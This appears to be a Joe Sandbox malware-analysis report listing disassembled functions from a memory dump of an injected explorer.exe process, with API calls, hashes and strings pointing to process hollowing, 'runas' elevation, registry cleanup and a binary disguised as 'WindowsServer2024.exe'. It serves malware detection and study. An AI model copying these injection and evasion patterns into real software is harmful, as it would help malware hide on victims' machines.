                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: bc4a491e1d895ba903ebd733a6c2b6428fd16bf76896332000bf1874532a21ec
                                                                            • Instruction ID: c1f29c0aac6beda0849fe06be852842039c9706aa404a5506b803bbaf64a81d4
                                                                            • Opcode Fuzzy Hash: bc4a491e1d895ba903ebd733a6c2b6428fd16bf76896332000bf1874532a21ec
                                                                            • Instruction Fuzzy Hash: FED017B2619680C7F6788B01E050BAB7360F7C0700F401010E39642994CF3CCA84CE00
                                                                            Function 00C04B30 Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: 60cf21f62d1dc145206f08a91dd1bba283ab904a53c73a5ec01a131829a1e1fa
                                                                            • Instruction ID: c1f29c0aac6beda0849fe06be852842039c9706aa404a5506b803bbaf64a81d4
                                                                            • Opcode Fuzzy Hash: 60cf21f62d1dc145206f08a91dd1bba283ab904a53c73a5ec01a131829a1e1fa
                                                                            • Instruction Fuzzy Hash: FED017B2619680C7F6788B01E050BAB7360F7C0700F401010E39642994CF3CCA84CE00
                                                                            Function 00C04C3E Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: fa60f3a416112e8adcec0e53fd871012574ce522b2df7edb6f362fde096d8998
                                                                            • Instruction ID: c1f29c0aac6beda0849fe06be852842039c9706aa404a5506b803bbaf64a81d4
                                                                            • Opcode Fuzzy Hash: fa60f3a416112e8adcec0e53fd871012574ce522b2df7edb6f362fde096d8998
                                                                            • Instruction Fuzzy Hash: FED017B2619680C7F6788B01E050BAB7360F7C0700F401010E39642994CF3CCA84CE00

                                                                            Non-executed Functions

                                                                            Function 00BEA8C0 Relevance: 98.4, APIs: 42, Strings: 14, Instructions: 440stringregistrylibraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • setsockopt.WS2_32 ref: 00BEAB8A
                                                                            • SetEvent.KERNEL32 ref: 00BEABFF
                                                                              • Part of subcall function 00BF7DA0: lstrlenW.KERNEL32 ref: 00BF7DEC
                                                                            • wnsprintfW.SHLWAPI ref: 00BEAC32
                                                                            • RegDeleteKeyExW.ADVAPI32 ref: 00BEAC50
                                                                            • wnsprintfW.SHLWAPI ref: 00BEAC83
                                                                            • RegDeleteKeyExW.ADVAPI32 ref: 00BEACA1
                                                                            • wnsprintfW.SHLWAPI ref: 00BEACD4
                                                                            • RegDeleteKeyExW.ADVAPI32 ref: 00BEACF2
                                                                            • wnsprintfW.SHLWAPI ref: 00BEAD25
                                                                            • RegDeleteKeyExW.ADVAPI32 ref: 00BEAD43
                                                                              • Part of subcall function 00BEF370: RegOpenKeyW.ADVAPI32 ref: 00BEF390
                                                                              • Part of subcall function 00BEF370: RegDeleteValueW.ADVAPI32 ref: 00BEF3A6
                                                                              • Part of subcall function 00BEF370: RegCloseKey.ADVAPI32 ref: 00BEF3B1
                                                                              • Part of subcall function 00BEF370: RegOpenKeyW.ADVAPI32 ref: 00BEF3D3
                                                                              • Part of subcall function 00BEF370: RegDeleteValueW.KERNEL32 ref: 00BEF3E9
                                                                              • Part of subcall function 00BEF370: RegCloseKey.ADVAPI32 ref: 00BEF3F4
                                                                              • Part of subcall function 00BF05B0: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00BE4277), ref: 00BF05CB
                                                                              • Part of subcall function 00BF05B0: SHGetKnownFolderPath.SHELL32 ref: 00BF05EF
                                                                              • Part of subcall function 00BF05B0: DeleteFileW.KERNEL32 ref: 00BF0625
                                                                              • Part of subcall function 00BF05B0: CoTaskMemFree.COMBASE ref: 00BF0630
                                                                              • Part of subcall function 00BF05B0: LocalFree.KERNEL32 ref: 00BF063B
                                                                              • Part of subcall function 00BF05B0: SHGetKnownFolderPath.SHELL32 ref: 00BF0652
                                                                              • Part of subcall function 00BF05B0: LocalAlloc.KERNEL32 ref: 00BF066A
                                                                              • Part of subcall function 00BF05B0: LocalAlloc.KERNEL32 ref: 00BF06B2
                                                                              • Part of subcall function 00BF05B0: DeleteFileW.KERNEL32 ref: 00BF06FD
                                                                              • Part of subcall function 00BF05B0: RemoveDirectoryW.KERNEL32 ref: 00BF0708
                                                                              • Part of subcall function 00BF05B0: LocalFree.KERNEL32 ref: 00BF0713
                                                                              • Part of subcall function 00BF05B0: LocalFree.KERNEL32 ref: 00BF071E
                                                                              • Part of subcall function 00BF05B0: CoTaskMemFree.COMBASE ref: 00BF0729
                                                                              • Part of subcall function 00BEFD90: CoInitializeEx.COMBASE ref: 00BEFDC0
                                                                              • Part of subcall function 00BEFD90: CoUninitialize.COMBASE ref: 00BF01C3
                                                                              • Part of subcall function 00BF0330: OpenEventW.KERNEL32 ref: 00BF0351
                                                                              • Part of subcall function 00BF0330: SetEvent.KERNEL32 ref: 00BF0372
                                                                              • Part of subcall function 00BF0330: CloseHandle.KERNEL32 ref: 00BF0380
                                                                              • Part of subcall function 00BF0330: OpenMutexW.KERNEL32 ref: 00BF03A0
                                                                              • Part of subcall function 00BF0330: WaitForSingleObject.KERNEL32 ref: 00BF03C6
                                                                              • Part of subcall function 00BF0330: CloseHandle.KERNEL32 ref: 00BF03D4
                                                                              • Part of subcall function 00BF0330: SHGetKnownFolderPath.SHELL32 ref: 00BF03EE
                                                                              • Part of subcall function 00BF0330: LocalAlloc.KERNEL32 ref: 00BF0406
                                                                              • Part of subcall function 00BF0330: lstrlenW.KERNEL32 ref: 00BF0467
                                                                              • Part of subcall function 00BF0330: GetFileAttributesW.KERNEL32 ref: 00BF04F3
                                                                              • Part of subcall function 00BF0330: LocalFree.KERNEL32 ref: 00BF0543
                                                                              • Part of subcall function 00BF0330: CoTaskMemFree.COMBASE ref: 00BF0551
                                                                              • Part of subcall function 00BF0330: wnsprintfW.SHLWAPI ref: 00BF057E
                                                                              • Part of subcall function 00BF0330: RegDeleteKeyExW.ADVAPI32 ref: 00BF0596
                                                                              • Part of subcall function 00BF01E0: SHGetKnownFolderPath.SHELL32 ref: 00BF01F8
                                                                              • Part of subcall function 00BF01E0: LocalAlloc.KERNEL32 ref: 00BF0210
                                                                              • Part of subcall function 00BF01E0: lstrlenW.KERNEL32 ref: 00BF0262
                                                                              • Part of subcall function 00BF01E0: GetFileAttributesW.KERNEL32 ref: 00BF02CA
                                                                              • Part of subcall function 00BF01E0: LocalFree.KERNEL32 ref: 00BF030B
                                                                              • Part of subcall function 00BF01E0: CoTaskMemFree.COMBASE ref: 00BF0316
                                                                              • Part of subcall function 00BEF790: SHGetKnownFolderPath.SHELL32(?,?,?,?,?,?,?,?,00BF67C4), ref: 00BEF7AF
                                                                              • Part of subcall function 00BEF790: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,00BF67C4), ref: 00BEF7C3
                                                                              • Part of subcall function 00BEF790: wnsprintfW.SHLWAPI ref: 00BEF7FC
                                                                              • Part of subcall function 00BEF790: lstrlenW.KERNEL32 ref: 00BEF80B
                                                                              • Part of subcall function 00BEF790: CoTaskMemFree.COMBASE ref: 00BEF81D
                                                                            • GetFileAttributesW.KERNEL32 ref: 00BEAE29
                                                                            • SHFileOperationW.SHELL32 ref: 00BEAE48
                                                                            • LocalFree.KERNEL32 ref: 00BEAE79
                                                                            • GetWindowsDirectoryW.KERNEL32 ref: 00BEAF37
                                                                            • CreateProcessW.KERNEL32 ref: 00BEB00A
                                                                            • GetCurrentProcess.KERNEL32 ref: 00BEB019
                                                                            • DuplicateHandle.KERNEL32 ref: 00BEB06B
                                                                            • GetCurrentProcess.KERNEL32 ref: 00BEB07A
                                                                            • DuplicateHandle.KERNEL32 ref: 00BEB0CB
                                                                            • LoadLibraryW.KERNEL32 ref: 00BEB0E2
                                                                            • GetProcAddress.KERNEL32 ref: 00BEB120
                                                                            • GetProcAddress.KERNEL32 ref: 00BEB13E
                                                                            • lstrcpyW.KERNEL32 ref: 00BEB15C
                                                                            • lstrcpyA.KERNEL32 ref: 00BEB172
                                                                            • lstrcpyA.KERNEL32 ref: 00BEB188
                                                                            • lstrcpyA.KERNEL32 ref: 00BEB19E
                                                                            • lstrcpyA.KERNEL32 ref: 00BEB1B4
                                                                            • lstrcpyA.KERNEL32 ref: 00BEB1CA
                                                                            • lstrcpyA.KERNEL32 ref: 00BEB1DD
                                                                            • lstrcpyW.KERNEL32 ref: 00BEB1F3
                                                                            • lstrcpyW.KERNEL32 ref: 00BEB209
                                                                            • LocalFree.KERNEL32 ref: 00BEB2D2
                                                                            • CloseHandle.KERNEL32 ref: 00BEB2F7
                                                                            • CloseHandle.KERNEL32 ref: 00BEB305
                                                                            • TerminateProcess.KERNEL32 ref: 00BEB31F
                                                                            • LocalFree.KERNEL32 ref: 00BEB32D
                                                                            • OpenEventW.KERNEL32 ref: 00BEB341
                                                                            • SetEvent.KERNEL32 ref: 00BEB362
                                                                            • CloseHandle.KERNEL32 ref: 00BEB370
                                                                            • shutdown.WS2_32 ref: 00BEB383
                                                                            • closesocket.WS2_32 ref: 00BEB391
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Deletelstrcpy$CloseHandle$AllocFilewnsprintf$EventFolderKnownOpenPathTask$Processlstrlen$Attributes$AddressCurrentDirectoryDuplicateProcValue$CreateInitializeLibraryLoadMutexObjectOperationRemoveSingleTerminateUninitializeWaitWindowsclosesocketsetsockoptshutdown
                                                                            • String ID: %s%s$2$SOFTWARE\%s$Software\%s$Software\%s$Software\%s$WindowsServer2024$WindowsServer2024.exe$h${54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}${70F925A9-13A6-49C0-913B-C685A8E9B495}${C2AC4D96-85E6-4EFA-B33C-9FC0845F6FAD}${D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}${DE7C4D5F-E773-43F0-B029-ED407FF538E8}
                                                                            • API String ID: 1118244034-1152069612
                                                                            • Opcode ID: 23aa255290207a63e2cf2737ff0bb318f956b8098ee3f5e525695e48c5fffa12
                                                                            • Instruction ID: bbb3766f659e7fb58020c60e6f41286200d7485b54822b392157e46d485fd28d
                                                                            • Opcode Fuzzy Hash: 23aa255290207a63e2cf2737ff0bb318f956b8098ee3f5e525695e48c5fffa12
                                                                            • Instruction Fuzzy Hash: 8642D436218BC595E771DB14E8A87DBB3A4F788755F900226D68D43BA8EF7CC648CB40
                                                                            Function 00BEE8C0 Relevance: 93.0, APIs: 43, Strings: 10, Instructions: 213stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCommandLineW.KERNEL32 ref: 00BEE8C7
                                                                            • CommandLineToArgvW.SHELL32 ref: 00BEE8DC
                                                                            • lstrcmpiW.KERNEL32 ref: 00BEE8F7
                                                                            • lstrcmpiW.KERNEL32 ref: 00BEE91D
                                                                              • Part of subcall function 00BE5AD0: GetModuleFileNameW.KERNEL32 ref: 00BE5AFE
                                                                              • Part of subcall function 00BE5AD0: _LDint.LIBCPMTD ref: 00BE5B15
                                                                              • Part of subcall function 00BE5AD0: CreateFileW.KERNEL32 ref: 00BE5B93
                                                                              • Part of subcall function 00BE5AD0: WriteFile.KERNEL32 ref: 00BE5BF0
                                                                              • Part of subcall function 00BE5AD0: CloseHandle.KERNEL32 ref: 00BE5C13
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$CommandLinelstrcmpi$ArgvCloseCreateDintHandleModuleNameWrite
                                                                            • String ID: shellcode${04D458D6-7C6C-445F-AEAD-313D698F1F0A}${4042FD4A-C237-4861-80BD-1FA24BEF8CE4}${427F0CCF-AF45-4A71-8E02-4FC2A2D64E46}${741330C7-73F4-49B6-9258-6679317DED46}${9A30B3AA-5D5B-4418-94BC-EA9A5585D123}${CCEFB138-B038-41E1-AC53-171A4E58AB6A}${F064C698-006D-4351-BA2C-625A53964F8D}${F6FB16F6-69D4-4502-9E85-2E5E52F61D5C}${F95B00D0-572A-45B1-BD9B-5DB7078A4AC4}
                                                                            • API String ID: 3070626111-596044211
                                                                            • Opcode ID: 7c865470e0464a453324e7636fbae510bfa24f6739339a5ff32697ba5d3373e2
                                                                            • Instruction ID: d8271b7dd54fb51b8732101fd5a5a550720d4fad77f146ff5b2f8058aa1ca8e4
                                                                            • Opcode Fuzzy Hash: 7c865470e0464a453324e7636fbae510bfa24f6739339a5ff32697ba5d3373e2
                                                                            • Instruction Fuzzy Hash: 7EB11C31204E8482F714DB66E8A876E73E1F7C8B91F605625E65A877A8DF7CC488D700
                                                                            Function 00BEA3B0 Relevance: 68.5, APIs: 29, Strings: 10, Instructions: 205memorystringprocessCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • setsockopt.WS2_32 ref: 00BEA460
                                                                            • SetEvent.KERNEL32 ref: 00BEA4CF
                                                                            • LocalAlloc.KERNEL32 ref: 00BEA50A
                                                                            • wnsprintfW.SHLWAPI ref: 00BEA54F
                                                                            • LocalAlloc.KERNEL32 ref: 00BEA55F
                                                                            • lstrcpyW.KERNEL32 ref: 00BEA58C
                                                                            • LocalAlloc.KERNEL32 ref: 00BEA5B5
                                                                            • lstrcpyW.KERNEL32 ref: 00BEA5E1
                                                                            • CoInitializeEx.COMBASE ref: 00BEA660
                                                                            • ShellExecuteExW.SHELL32 ref: 00BEA675
                                                                            • GetLastError.KERNEL32 ref: 00BEA682
                                                                            • CoUninitialize.COMBASE ref: 00BEA699
                                                                            • LocalAlloc.KERNEL32 ref: 00BEA6E2
                                                                            • wnsprintfW.SHLWAPI ref: 00BEA733
                                                                            • CreateProcessW.KERNEL32 ref: 00BEA7A2
                                                                            • OpenEventW.KERNEL32 ref: 00BEA7C7
                                                                            • SetEvent.KERNEL32 ref: 00BEA7E8
                                                                            • CloseHandle.KERNEL32 ref: 00BEA7F6
                                                                            • LocalFree.KERNEL32 ref: 00BEA804
                                                                            • LocalFree.KERNEL32 ref: 00BEA812
                                                                            • OpenEventW.KERNEL32 ref: 00BEA828
                                                                            • SetEvent.KERNEL32 ref: 00BEA849
                                                                            • CloseHandle.KERNEL32 ref: 00BEA857
                                                                            • LocalFree.KERNEL32 ref: 00BEA865
                                                                            • LocalFree.KERNEL32 ref: 00BEA873
                                                                            • LocalFree.KERNEL32 ref: 00BEA881
                                                                            • LocalFree.KERNEL32 ref: 00BEA88F
                                                                            • shutdown.WS2_32 ref: 00BEA89F
                                                                            • closesocket.WS2_32 ref: 00BEA8AA
                                                                              • Part of subcall function 00BEFBA0: CreateDirectoryW.KERNEL32 ref: 00BEFBD8
                                                                              • Part of subcall function 00BEFBA0: GetLastError.KERNEL32 ref: 00BEFBE3
                                                                              • Part of subcall function 00BEFBA0: LocalAlloc.KERNEL32 ref: 00BEFBFE
                                                                              • Part of subcall function 00BEFBA0: CreateFileW.KERNEL32 ref: 00BEFC6E
                                                                              • Part of subcall function 00BEFBA0: GetLastError.KERNEL32 ref: 00BEFC79
                                                                              • Part of subcall function 00BEFBA0: LocalFree.KERNEL32 ref: 00BEFD16
                                                                              • Part of subcall function 00BEFBA0: LocalFree.KERNEL32 ref: 00BEFD21
                                                                              • Part of subcall function 00BEF510: SHGetKnownFolderPath.SHELL32 ref: 00BEF587
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF59A
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF5B5
                                                                              • Part of subcall function 00BEF510: LocalAlloc.KERNEL32 ref: 00BEF5DC
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF620
                                                                              • Part of subcall function 00BEF510: CoTaskMemFree.COMBASE ref: 00BEF635
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc$Event$CreateErrorLastlstrlen$CloseHandleOpenlstrcpywnsprintf$DirectoryExecuteFileFolderInitializeKnownPathProcessShellTaskUninitializeclosesocketsetsockoptshutdown
                                                                            • String ID: "%s%s"$"%s%s" %s$@@$WindowsServer2024.exe$h$p$runas${427F0CCF-AF45-4A71-8E02-4FC2A2D64E46}${54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}${F064C698-006D-4351-BA2C-625A53964F8D}
                                                                            • API String ID: 852330099-763692919
                                                                            • Opcode ID: c0e811617835f277e743a61c36cfd185c99e4cdd70c3a92dedbbbdc4c413d21c
                                                                            • Instruction ID: ca02ce148374af9aabace0a7bd83888a5ec170256942377d5894edc124a7f08d
                                                                            • Opcode Fuzzy Hash: c0e811617835f277e743a61c36cfd185c99e4cdd70c3a92dedbbbdc4c413d21c
                                                                            • Instruction Fuzzy Hash: 3BC1B536218AC186E770DB15F4A87DEB3A4F788754F504226DA8E43BA8DF7CC589CB01
                                                                            Function 00BE7940 Relevance: 51.0, APIs: 26, Strings: 3, Instructions: 228nativethreadprocessCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Section$View$CloseUnmap$Process$CreateCurrentThread$ContextHandle$ResumeTerminate
                                                                            • String ID: @$@$h
                                                                            • API String ID: 2911138354-1939477041
                                                                            • Opcode ID: 0e9cbf2f4c6151c413ac656ea9fe00880fd01cba0e98bc66d04b8f41cef37c28
                                                                            • Instruction ID: ad4c50d249857427ca307e0a3b76862e5927224e9a2da2106d813de5b8d8998d
                                                                            • Opcode Fuzzy Hash: 0e9cbf2f4c6151c413ac656ea9fe00880fd01cba0e98bc66d04b8f41cef37c28
                                                                            • Instruction Fuzzy Hash: F5D19F76118AC086E770DF15F4A879EB7A1F3C8794F504225EA8A83B68DF7DC598CB40
                                                                            Function 00C0F834 Relevance: 40.7, APIs: 22, Strings: 1, Instructions: 465COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __doserrno_errno_invalid_parameter_noinfo
                                                                            • String ID: U
                                                                            • API String ID: 3902385426-4171548499
                                                                            • Opcode ID: 26d7c4cfa49adc4cd658d17e3e0790a6ca28b03908bebd92be2b82887c9fcb7c
                                                                            • Instruction ID: bf95555fa261bd9e398427ca8bbeefb6110853ebd25d8fc175ad0a2c676ecef0
                                                                            • Opcode Fuzzy Hash: 26d7c4cfa49adc4cd658d17e3e0790a6ca28b03908bebd92be2b82887c9fcb7c
                                                                            • Instruction Fuzzy Hash: 9B02F333314A8586EB308F25E4943AA7761F789B44F54412AEB9947BA9DF3DC58BCB00
                                                                            Function 00BF2310 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 144threadsleepkeyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: EventExitThreadUser$AsyncCloseHandleObjectOpenSingleSleepStateWaitlstrlen
                                                                            • String ID: 2${54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}
                                                                            • API String ID: 4137407306-4117667122
                                                                            • Opcode ID: 555e6d94e05c87790594ac9a0f30c17685f3254bc8a297b2fa6ae3024f6cd553
                                                                            • Instruction ID: d43a386809a09ea592d43dc7534989f04e3f5e98dbfb03794c53047598f5ac59
                                                                            • Opcode Fuzzy Hash: 555e6d94e05c87790594ac9a0f30c17685f3254bc8a297b2fa6ae3024f6cd553
                                                                            • Instruction Fuzzy Hash: 31817F76209BC499EB71CB10F4947EAB3A8F789354F50422AD68D53B69EF3CC198CB44
                                                                            Function 00C0E88C Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 159fileCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _set_error_mode.LIBCMT ref: 00C0E8D1
                                                                            • _set_error_mode.LIBCMT ref: 00C0E8E2
                                                                            • GetModuleFileNameW.KERNEL32 ref: 00C0E944
                                                                              • Part of subcall function 00C0A834: GetCurrentProcess.KERNEL32(?,?,?,?,00C0A8D6), ref: 00C0A84C
